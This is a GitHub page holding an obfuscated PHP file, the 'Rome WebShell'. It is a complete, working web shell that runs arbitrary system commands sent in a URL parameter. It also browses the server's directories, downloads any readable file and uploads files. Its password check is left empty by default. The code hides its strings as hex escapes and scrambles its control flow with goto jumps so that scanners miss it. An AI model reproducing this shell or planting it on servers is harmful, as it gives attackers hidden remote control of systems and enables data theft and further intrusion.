-
Notifications
You must be signed in to change notification settings - Fork 10
/
rome-shell-obfuscated.php
39 lines (36 loc) · 14.5 KB
/
rome-shell-obfuscated.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php
goto k9nk7; RZxHM: echo getCommandLine(); goto nXIEc; G0fZC: function getFiles() { $files = scandir(getDir()); $even = true; if ($files != null) { foreach ($files as $filename) { echo "\x3c\x74\x72\40\163\x74\x79\x6c\x65\75\x22\x62\141\143\x6b\147\162\x6f\x75\156\144\x2d\x63\x6f\x6c\157\162\72" . ($even ? "\x23\x35\x31\x35\61\x35\x31" : "\x23\64\x31\64\61\x34\61") . "\x3b\x22\x3e"; echo "\x3c\x74\144\40\x73\164\x79\154\x65\x3d\42\x66\x6f\x6e\164\x2d\167\145\x69\x67\150\x74\72" . (is_dir(getDir() . "\x2f" . $filename) ? "\x62\x6f\154\144" : "\x74\x68\151\x6e") . "\x3b\x22\x3e" . makeFileName($filename) . "\74\57\x74\x64\76"; echo "\74\164\x64\76" . posix_getpwuid(fileowner(getDir() . "\57" . $filename))["\x6e\141\155\x65"] . "\x3c\57\x74\x64\x3e"; echo "\74\164\144\76" . printPerms(getDir() . "\x2f" . $filename) . "\74\57\x74\144\76"; echo "\74\x74\144\x3e" . formatSizeUnits(filesize(getDir() . "\57" . $filename)) . "\x3c\x2f\164\144\76"; echo "\x3c\57\164\x72\x3e"; $even = !$even; } } else { echo "\x3c\x70\x3e\x43\x6f\165\154\144\156\x27\x74\x20\157\x70\145\x6e\40\164\x68\141\x74\40\x64\x69\x72\145\x63\164\157\162\171\x20\x21"; } } goto rmgNn; JOIEP: function getCommandLine() { $hostname = gethostname() ?? "\x6e\x6f\156\x65"; $username = posix_getpwuid(posix_geteuid())["\x6e\141\x6d\145"]; $dir = getDir(); $cmd = isset($_GET["\143\x6d\x64"]) ? $_GET["\143\155\144"] : "\116\157\x20\143\x6f\155\x6d\141\156\144"; return "\x3c\163\x70\141\156\40\163\164\x79\x6c\145\75\x22\x63\x6f\x6c\x6f\x72\72\40\43\61\71\143\x34\x32\x61\x22\x3e" . $username . "\x40" . $hostname . "\74\57\163\160\141\x6e\76\72\40\74\x73\160\x61\x6e\x20\x73\x74\171\x6c\145\75\x22\x63\x6f\154\x6f\x72\x3a\x20\x23\60\146\67\x35\62\61\42\76" . $dir . "\74\57\x73\x70\x61\156\76\x24\x20" . $cmd; } goto j090x; YY58X: if ($pass != null) { if (isset($_COOKIE["\x70\x61\x73\163"])) { if (hash("\x73\x68\141\x35\61\x32", $_COOKIE["\160\141\163\163"]) !== $pass) { echo "\x57\162\x6f\x6e\147\x20\x70\141\163\163\x77\x6f\162\x64\x20\41"; die; } } else { echo "\127\162\x6f\x6e\147\x20\160\x61\163\163\167\x6f\x72\144\40\x21"; die; } } goto SB_KD; QIWmY: ?>
"id="command-input"><input name="cmd"> <input name="dir"type="hidden"value="<?php goto tJdhK; AvLT3: if (isset($_GET["\x63\x6d\x64"])) { exec("\143\144\x20" . realpath(getDir()) . "\40\46\46\x20" . $_GET["\x63\155\144"], $cmdresults, $retval); } goto zo0Y5; tJdhK: echo getDir(); goto M2p5s; CfSha: function makeFileName($file) { if (is_dir(getDir() . "\57" . $file)) { return "\x3c\x61\40\150\162\x65\x66\x3d\42" . $_SERVER["\x50\x48\120\x5f\x53\105\114\106"] . "\x3f\144\x69\x72\75" . realpath(getDir() . "\x2f" . $file) . "\x22\x3e" . $file . "\x3c\x2f\141\x3e"; } else { return "\74\x61\x20\x68\x72\x65\x66\75\x22" . $_SERVER["\x50\x48\120\x5f\x53\105\114\106"] . "\x3f\144\x6f\167\x6e\154\x6f\141\x64\75" . realpath(getDir() . "\57" . $file) . "\42\x3e" . $file . "\x3c\x2f\141\x3e"; } } goto G0fZC; ETPuw: function getDir() { return isset($_GET["\x64\151\162"]) ? realpath($_GET["\x64\151\162"]) : getcwd(); } goto CfSha; iXKoB: echo $_SERVER["\x50\x48\x50\x5f\x53\105\114\106"]; goto QIWmY; gb6vP: echo $_SERVER["\120\110\120\137\x53\105\x4c\106"] . "\77\x64\x69\162\x3d"; goto uF9j8; zo0Y5: ?>
<!doctypehtml><html><head><meta charset="utf-8"><title>Rome WebShell</title><script>function changeDir() {
const url = '<?php goto gb6vP; uF9j8: ?>';
const path = window.prompt("Enter the path you want to naviguate to (Eg: '/home/user'): ");
if (path) window.location = (url + path);
}</script><script>const popupHTML = `
<div class="popup-container" id="upload-popup">
<div class="popup">
<h4>Choose a file to upload</h4>
<form action="<?php goto AOeE_; oF70B: ?>
" method="POST" enctype="multipart/form-data">
<input type="file" name='file' id='file' required>
<div class="popup-buttons">
<button type="button" onclick="hidePopup()">Cancel</button>
<input type="submit" value="Upload" name="upload">
</div>
</form>
</div>
</div>
`;
function showPopup() {
const body = document.getElementsByTagName('body')[0];
const bodyHTML = body.innerHTML;
body.innerHTML = popupHTML + bodyHTML;
}
function hidePopup() {
const body = document.getElementsByTagName('body')[0];
body.removeChild(body.getElementsByClassName('popup-container')[0]);
}</script></head><body class="body-container"><header><nav><h1>> Rome Shell</h1><div class="nav-items"><a onclick="showPopup()">Upload file</a> <a onclick="changeDir()">Change Directory</a></div></nav></header><div class="content-container"><div class="explorer-panel"><h4>Exploring:<?php goto PCg56; Qvb2t: ?>
</p></div><form action="<?php goto iXKoB; sehAW: ?>
</h4><table><tr style="background-color:#292929"><th>Folder / <span style="font-weight:lighter">File</span></th><th>Owner</th><th>Permissions</th><th>Size</th></tr><?php goto ovPbP; j090x: $cmdresults; goto YXvoc; k9nk7: $pass = ''; goto YY58X; YXvoc: $retval = null; goto AvLT3; CmY23: ?>
</table></div><div class="command-panel"><div class="command-output"><p><?php goto RZxHM; XvHUN: function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . "\x20\107\x42"; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . "\40\x4d\x42"; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . "\40\113\x42"; } elseif ($bytes > 1) { $bytes = $bytes . "\x20\x62\x79\164\x65\x73"; } elseif ($bytes == 1) { $bytes = $bytes . "\x20\x62\x79\x74\x65"; } else { $bytes = "\60\40\142\x79\164\x65\x73"; } return $bytes; } goto ETPuw; lEFc1: if (isset($_GET["\x64\x6f\x77\156\x6c\157\x61\x64"])) { $file = $_GET["\x64\157\167\156\x6c\x6f\141\x64"]; if (file_exists($file)) { if (is_readable($file)) { header("\103\x6f\156\164\x65\x6e\x74\55\104\x65\163\x63\162\151\160\x74\x69\157\156\x3a\x20\x46\151\154\145\40\124\162\141\156\163\x66\x65\x72"); header("\x43\157\x6e\164\x65\156\x74\x2d\x54\x79\x70\145\x3a\x20\x61\160\x70\154\x69\143\141\164\x69\x6f\156\x2f\157\x63\x74\145\x74\x2d\163\x74\x72\x65\141\155"); header("\x43\x6f\156\164\x65\156\x74\x2d\104\x69\163\160\x6f\163\x69\x74\151\x6f\156\x3a\40\x61\x74\164\141\143\150\x6d\145\x6e\164\73\x20\146\x69\x6c\145\156\141\155\145\x3d\42" . basename($file) . "\42"); header("\x45\170\x70\x69\162\x65\x73\72\40\60"); header("\103\141\x63\x68\x65\55\x43\157\x6e\164\x72\157\x6c\72\40\155\x75\x73\164\55\162\145\x76\141\x6c\x69\x64\141\164\145"); header("\x50\x72\x61\147\x6d\141\72\x20\x70\x75\142\154\151\143"); header("\103\157\x6e\164\x65\156\164\x2d\x4c\145\156\x67\164\150\72\x20" . filesize($file)); readfile($file); die; } else { echo "\x3c\x73\143\x72\x69\x70\x74\x3e\x61\154\x65\x72\164\x28\47\105\x72\x72\x6f\x72\x3a\40\x43\157\165\x6c\x64\x20\156\x6f\164\x20\162\145\x61\144\x20\x74\150\x65\x20\x66\x69\154\145\x20\41\x27\51\74\57\163\x63\x72\151\x70\x74\x3e"; die; } } } goto O7FZo; ovPbP: getFiles(); goto CmY23; WOLEX: getCmdResults(); goto Qvb2t; SB_KD: if (isset($_POST["\165\x70\154\157\x61\144"])) { $desinationDir = getDir(); $destinationFile = $desinationDir . "\x2f" . basename($_FILES["\146\151\x6c\x65"]["\x6e\x61\155\145"]); if (file_exists($destinationFile)) { echo "\x3c\x73\x63\x72\x69\160\x74\x3e\141\154\x65\162\164\x28\x27\x45\162\162\157\x72\72\x20\x46\151\154\x65\40\141\154\x72\x65\x61\x64\171\x20\x65\170\151\x73\164\x73\40\x21\x27\x29\x3c\57\x73\x63\162\151\160\164\76"; } else { if (move_uploaded_file($_FILES["\x66\151\x6c\x65"]["\x74\155\160\137\156\141\x6d\x65"], $destinationFile)) { echo "\74\x73\143\x72\151\x70\x74\76\x61\154\x65\162\x74\x28\47\x46\x69\x6c\145\x20\x75\160\x6c\157\x61\x64\x65\x64\40\163\165\143\143\x65\x73\x73\x66\165\x6c\x79\x20\x21\x27\x29\74\57\163\143\x72\x69\x70\x74\76"; } else { echo "\x3c\163\143\x72\x69\x70\164\76\141\x6c\145\162\x74\50\47\105\162\x72\157\162\72\x20\103\157\x75\x6c\144\x20\156\157\x74\40\x75\x70\154\x6f\141\x64\x20\146\151\x6c\x65\40\41\x27\51\x3c\57\x73\x63\162\151\160\164\76"; } } } goto lEFc1; AOeE_: echo $_SERVER["\x50\110\120\x5f\x53\x45\x4c\106"] . "\77\144\151\162\75" . getDir(); goto oF70B; O7FZo: function printPerms($file) { $mode = fileperms($file); if ($mode & 4096) { $type = "\160"; } else { if ($mode & 8192) { $type = "\143"; } else { if ($mode & 16384) { $type = "\x64"; } else { if ($mode & 24576) { $type = "\142"; } else { if ($mode & 32768) { $type = "\x2d"; } else { if ($mode & 40960) { $type = "\x6c"; } else { if ($mode & 49152) { $type = "\163"; } else { $type = "\x75"; } } } } } } } $owner["\x72\145\141\144"] = $mode & 256 ? "\162" : "\55"; $owner["\167\162\x69\x74\145"] = $mode & 128 ? "\167" : "\55"; $owner["\145\170\x65\143\x75\x74\x65"] = $mode & 64 ? "\x78" : "\55"; $group["\x72\x65\x61\144"] = $mode & 32 ? "\162" : "\55"; $group["\x77\162\x69\164\145"] = $mode & 16 ? "\x77" : "\x2d"; $group["\145\170\145\143\x75\x74\145"] = $mode & 8 ? "\x78" : "\x2d"; $world["\x72\x65\x61\x64"] = $mode & 4 ? "\x72" : "\x2d"; $world["\x77\162\151\164\x65"] = $mode & 2 ? "\167" : "\x2d"; $world["\x65\x78\x65\x63\x75\x74\x65"] = $mode & 1 ? "\x78" : "\x2d"; if ($mode & 2048) { $owner["\145\x78\x65\x63\x75\x74\x65"] = $owner["\x65\170\x65\x63\165\164\x65"] == "\170" ? "\x73" : "\123"; } if ($mode & 1024) { $group["\145\x78\145\143\x75\x74\145"] = $group["\x65\x78\x65\x63\165\x74\x65"] == "\170" ? "\163" : "\x53"; } if ($mode & 512) { $world["\x65\x78\x65\143\x75\164\145"] = $world["\145\x78\x65\x63\165\x74\145"] == "\170" ? "\164" : "\x54"; } $s = sprintf("\x25\x31\163", $type); $s .= sprintf("\45\61\x73\45\61\x73\x25\x31\163", $owner["\x72\145\x61\144"], $owner["\167\162\151\x74\x65"], $owner["\145\x78\x65\x63\x75\x74\x65"]); $s .= sprintf("\45\61\163\45\61\x73\x25\x31\163", $group["\162\x65\x61\144"], $group["\167\x72\151\x74\x65"], $group["\145\x78\145\x63\165\x74\x65"]); $s .= sprintf("\x25\61\163\x25\61\x73\45\x31\x73", $world["\x72\145\x61\x64"], $world["\167\162\151\x74\145"], $world["\145\x78\145\x63\x75\164\x65"]); return $s; } goto XvHUN; rmgNn: function getCmdResults() { global $cmdresults; global $retval; if ($retval == 0) { foreach ($cmdresults as $line) { echo "{$line}\40\xa\x3c\142\x72\76"; } } else { echo "\105\170\x65\143\x75\x74\151\157\156\x20\x66\x61\151\154\145\144\x20\167\151\x74\x68\x20\x65\162\x72\157\162\40\143\x6f\144\x65\72\x20" . $retval; } } goto JOIEP; nXIEc: ?>
</p><p><?php goto WOLEX; PCg56: echo getDir(); goto sehAW; M2p5s: ?>
"> <button action="submit"><p>Send</p></button></form></div></div><style>:root{--background-color-1:#101010;--background-color-2:#202020;--background-color-3:#303030;--background-color-4:#404040;--primary-color:#0e9c15;--secondary-color:#0f7521}body,html{width:100%;height:100%;margin:0;padding:0;background-color:var(--background-color-2)}.body-container{display:grid;grid-template-rows:50px calc(100% - 50px)}header{z-index:1;background-color:var(--primary-color);box-shadow:0 2px 6px #000}header nav{height:100%;display:flex;justify-content:flex-start;color:#fff;font-family:Arial,Helvetica,sans-serif}header h1{height:100%;margin:0;margin-left:20px;text-align:center;line-height:50px;font-size:40px}header .nav-items{height:100%;width:auto;margin:0;display:flex;flex-grow:1;justify-content:flex-end}header .nav-items a{height:100%;margin-right:30px;color:#fff;font-size:25px;text-decoration:none;line-height:50px;text-align:center;transition:ease-in .2s}header .nav-items a:hover{color:#d0d0d0;cursor:pointer}.content-container{height:100%;position:relative;display:grid;grid-template-columns:30% 70%}.explorer-panel{background-color:var(--background-color-3);font-family:'Trebuchet MS','Lucida Sans Unicode','Lucida Grande','Lucida Sans',Arial,sans-serif;overflow-y:scroll;scrollbar-color:var(--background-color-4) var(--background-color-3);scrollbar-width:thin;box-shadow:0 0 4px #000;padding:3px}.explorer-panel h4{margin:10px;font-size:20px}.explorer-panel table{width:100%;word-wrap:break-word;border-spacing:2px;table-layout:fixed;background-color:var(--background-color-2)}.explorer-panel table td{padding:1px 2px}.explorer-panel table a{color:var(--primary-color);text-decoration:none}.explorer-panel table a:hover{color:var(--secondary-color);transition:ease .2s}.command-panel{margin:20px;padding:15px;border-radius:5px;background-color:var(--background-color-3);display:grid;grid-template-rows:93% calc(7% - 15px);row-gap:15px;box-shadow:0 0 6px #000}.command-output{padding:5px;border-radius:5px;background-color:var(--background-color-1);overflow-y:scroll;scrollbar-color:var(--background-color-4) var(--background-color-3);scrollbar-width:thin}.command-output p{margin:0;font-family:'Gill Sans','Gill Sans MT',Calibri,'Trebuchet MS',sans-serif}#command-input{display:grid;grid-template-columns:89% 10%;grid-template-rows:100%;column-gap:1%}#command-input input{height:100%;width:100%;border-radius:5px;border:none;background-color:var(--background-color-2);color:#fff;font-size:200%}#command-input button{height:100%;width:100%;border:none;border-radius:5px;background-color:var(--background-color-4);cursor:pointer}#command-input button:hover{background-color:var(--primary-color);transition:ease-in-out .3s}#command-input button p{margin:0;color:#fff;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;font-size:150%;font-weight:bolder;line-height:100%}.popup-container{z-index:5;position:fixed;background-color:rgba(10,10,10,.6);width:100%;height:100%;display:grid;justify-content:center;align-content:center;grid-template-columns:30%;grid-template-rows:35%}.popup{background-color:var(--background-color-3);border-radius:5px;box-shadow:0 2px 6px #000;display:grid;grid-template-rows:20% 70%;row-gap:10%;padding:2.5%}.popup h4{text-align:center;font-family:'Courier New',Courier,monospace;font-size:23px}.popup form{display:grid;grid-template-rows:80% 20%;grid-template-columns:95%;justify-content:center;align-content:center}.popup-buttons{height:100%;display:inline-flex;flex-wrap:wrap;gap:10%}.popup-buttons button{width:45%;background-color:var(--background-color-4);border-radius:4px;border:none;font-size:22px;color:#fff;transition:ease-in .2s}.popup-buttons button:hover{background-color:var(--background-color-2);cursor:pointer}.popup-buttons input{width:45%;background-color:var(--primary-color);border-radius:4px;border:none;font-size:22px;color:#fff;transition:ease-in .2s}.popup-buttons input:hover{background-color:var(--secondary-color);cursor:pointer}</style></body></html>